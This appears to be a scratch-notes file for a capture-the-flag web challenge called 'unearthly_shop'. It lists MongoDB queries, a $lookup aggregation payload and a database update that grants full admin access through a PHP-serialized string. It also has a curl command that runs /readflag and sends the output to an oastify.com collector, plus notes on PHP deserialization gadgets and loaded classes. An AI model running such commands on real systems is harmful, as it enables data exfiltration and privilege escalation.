schema --> unearthly_shop

show collections

db.orders.find()


--------------------

db.orders.aggregate([{"$match":{"instock":true}}])


[{"$lookup":
        {
           "from": "users",
           "localField": "_id",
           "foreignField": "_id",
           "as": "test"
        }}]
        
        
        
curl http://q8z62rdv2972pnh2wcnow3s960cs0h.oastify.com -d $(/readflag)


db.users.find()


db.users.updateOne({ _id: 1 },{$set: {"access": "a:4:{s:9:\"Dashboard\";b:1;s:7:\"Product\";b:1;s:5:\"Order\";b:1;s:4:\"User\";b:1;}"}})

<! -- LIBS --> 

"name": "guzzlehttp/guzzle",
"version": "6.5.8",


"name": "monolog/monolog",
"version": "2.9.1",


https://www.php.net/manual/en/book.mongodb.php


https://www.php.net/manual/en/language.oop5.magic.php

__(construct|destruct|call|callStatic|get|set|isset|unset|sleep|wakeup|serialize|unserialize|toString|invoke|set_state|clone|debugInfo)

<! -- Loaded Classes --> 
Array
(
    [0] => stdClass
    [1] => Exception
    [2] => ErrorException
    [3] => Error
    [4] => CompileError
    [5] => ParseError
    [6] => TypeError
    [7] => ArgumentCountError
    [8] => ArithmeticError
    [9] => DivisionByZeroError
    [10] => Closure
    [11] => Generator
    [12] => ClosedGeneratorException
    [13] => WeakReference
    [14] => DateTime
    [15] => DateTimeImmutable
    [16] => DateTimeZone
    [17] => DateInterval
    [18] => DatePeriod
    [19] => LibXMLError
    [20] => HashContext
    [21] => ReflectionException
    [22] => Reflection
    [23] => ReflectionFunctionAbstract
    [24] => ReflectionFunction
    [25] => ReflectionGenerator
    [26] => ReflectionParameter
    [27] => ReflectionType
    [28] => ReflectionNamedType
    [29] => ReflectionMethod
    [30] => ReflectionClass
    [31] => ReflectionObject
    [32] => ReflectionProperty
    [33] => ReflectionClassConstant
    [34] => ReflectionExtension
    [35] => ReflectionZendExtension
    [36] => ReflectionReference
    [37] => LogicException
    [38] => BadFunctionCallException
    [39] => BadMethodCallException
    [40] => DomainException
    [41] => InvalidArgumentException
    [42] => LengthException
    [43] => OutOfRangeException
    [44] => RuntimeException
    [45] => OutOfBoundsException
    [46] => OverflowException
    [47] => RangeException
    [48] => UnderflowException
    [49] => UnexpectedValueException
    [50] => RecursiveIteratorIterator
    [51] => IteratorIterator
    [52] => FilterIterator
    [53] => RecursiveFilterIterator
    [54] => CallbackFilterIterator
    [55] => RecursiveCallbackFilterIterator
    [56] => ParentIterator
    [57] => LimitIterator
    [58] => CachingIterator
    [59] => RecursiveCachingIterator
    [60] => NoRewindIterator
    [61] => AppendIterator
    [62] => InfiniteIterator
    [63] => RegexIterator
    [64] => RecursiveRegexIterator
    [65] => EmptyIterator
    [66] => RecursiveTreeIterator
    [67] => ArrayObject
    [68] => ArrayIterator
    [69] => RecursiveArrayIterator
    [70] => SplFileInfo
    [71] => DirectoryIterator
    [72] => FilesystemIterator
    [73] => RecursiveDirectoryIterator
    [74] => GlobIterator
    [75] => SplFileObject
    [76] => SplTempFileObject
    [77] => SplDoublyLinkedList
    [78] => SplQueue
    [79] => SplStack
    [80] => SplHeap
    [81] => SplMinHeap
    [82] => SplMaxHeap
    [83] => SplPriorityQueue
    [84] => SplFixedArray
    [85] => SplObjectStorage
    [86] => MultipleIterator
    [87] => SessionHandler
    [88] => __PHP_Incomplete_Class
    [89] => php_user_filter
    [90] => Directory
    [91] => AssertionError
    [92] => SodiumException
    [93] => PDOException
    [94] => PDO
    [95] => PDOStatement
    [96] => PDORow
    [97] => FFI\Exception
    [98] => FFI\ParserException
    [99] => FFI
    [100] => FFI\CData
    [101] => FFI\CType
    [102] => finfo
    [103] => JsonException
    [104] => MongoDB\BSON\Binary
    [105] => MongoDB\BSON\DBPointer
    [106] => MongoDB\BSON\Decimal128
    [107] => MongoDB\BSON\Int64
    [108] => MongoDB\BSON\Javascript
    [109] => MongoDB\BSON\MaxKey
    [110] => MongoDB\BSON\MinKey
    [111] => MongoDB\BSON\ObjectId
    [112] => MongoDB\BSON\Regex
    [113] => MongoDB\BSON\Symbol
    [114] => MongoDB\BSON\Timestamp
    [115] => MongoDB\BSON\Undefined
    [116] => MongoDB\BSON\UTCDateTime
    [117] => MongoDB\Driver\BulkWrite
    [118] => MongoDB\Driver\ClientEncryption
    [119] => MongoDB\Driver\Command
    [120] => MongoDB\Driver\Cursor
    [121] => MongoDB\Driver\CursorId
    [122] => MongoDB\Driver\Manager
    [123] => MongoDB\Driver\Query
    [124] => MongoDB\Driver\ReadConcern
    [125] => MongoDB\Driver\ReadPreference
    [126] => MongoDB\Driver\Server
    [127] => MongoDB\Driver\ServerApi
    [128] => MongoDB\Driver\ServerDescription
    [129] => MongoDB\Driver\TopologyDescription
    [130] => MongoDB\Driver\Session
    [131] => MongoDB\Driver\WriteConcern
    [132] => MongoDB\Driver\WriteConcernError
    [133] => MongoDB\Driver\WriteError
    [134] => MongoDB\Driver\WriteResult
    [135] => MongoDB\Driver\Exception\RuntimeException
    [136] => MongoDB\Driver\Exception\ServerException
    [137] => MongoDB\Driver\Exception\ConnectionException
    [138] => MongoDB\Driver\Exception\WriteException
    [139] => MongoDB\Driver\Exception\AuthenticationException
    [140] => MongoDB\Driver\Exception\BulkWriteException
    [141] => MongoDB\Driver\Exception\CommandException
    [142] => MongoDB\Driver\Exception\ConnectionTimeoutException
    [143] => MongoDB\Driver\Exception\EncryptionException
    [144] => MongoDB\Driver\Exception\ExecutionTimeoutException
    [145] => MongoDB\Driver\Exception\InvalidArgumentException
    [146] => MongoDB\Driver\Exception\LogicException
    [147] => MongoDB\Driver\Exception\SSLConnectionException
    [148] => MongoDB\Driver\Exception\UnexpectedValueException
    [149] => MongoDB\Driver\Monitoring\CommandFailedEvent
    [150] => MongoDB\Driver\Monitoring\CommandStartedEvent
    [151] => MongoDB\Driver\Monitoring\CommandSucceededEvent
    [152] => MongoDB\Driver\Monitoring\ServerChangedEvent
    [153] => MongoDB\Driver\Monitoring\ServerClosedEvent
    [154] => MongoDB\Driver\Monitoring\ServerHeartbeatFailedEvent
    [155] => MongoDB\Driver\Monitoring\ServerHeartbeatStartedEvent
    [156] => MongoDB\Driver\Monitoring\ServerHeartbeatSucceededEvent
    [157] => MongoDB\Driver\Monitoring\ServerOpeningEvent
    [158] => MongoDB\Driver\Monitoring\TopologyChangedEvent
    [159] => MongoDB\Driver\Monitoring\TopologyClosedEvent
    [160] => MongoDB\Driver\Monitoring\TopologyOpeningEvent
    [161] => MessagePack
    [162] => MessagePackUnpacker
    [163] => PharException
    [164] => Phar
    [165] => PharData
    [166] => PharFileInfo
    [167] => Memcached
    [168] => MemcachedException
    [169] => ComposerAutoloaderInit4db8c08e94dba89e1b0a0d752fcc229d
    [170] => Composer\Autoload\ClassLoader
    [171] => Composer\Autoload\ComposerStaticInit4db8c08e94dba89e1b0a0d752fcc229d
    [172] => Database
    [173] => MongoDB\Client
    [174] => Jean85\PrettyVersions
    [175] => Composer\InstalledVersions
    [176] => Jean85\Version
    [177] => MongoDB\Database
    [178] => Router
    [179] => ProductController
    [180] => Controller
    [181] => UserModel
    [182] => Model
    [183] => ProductModel
    [184] => OrderModel
)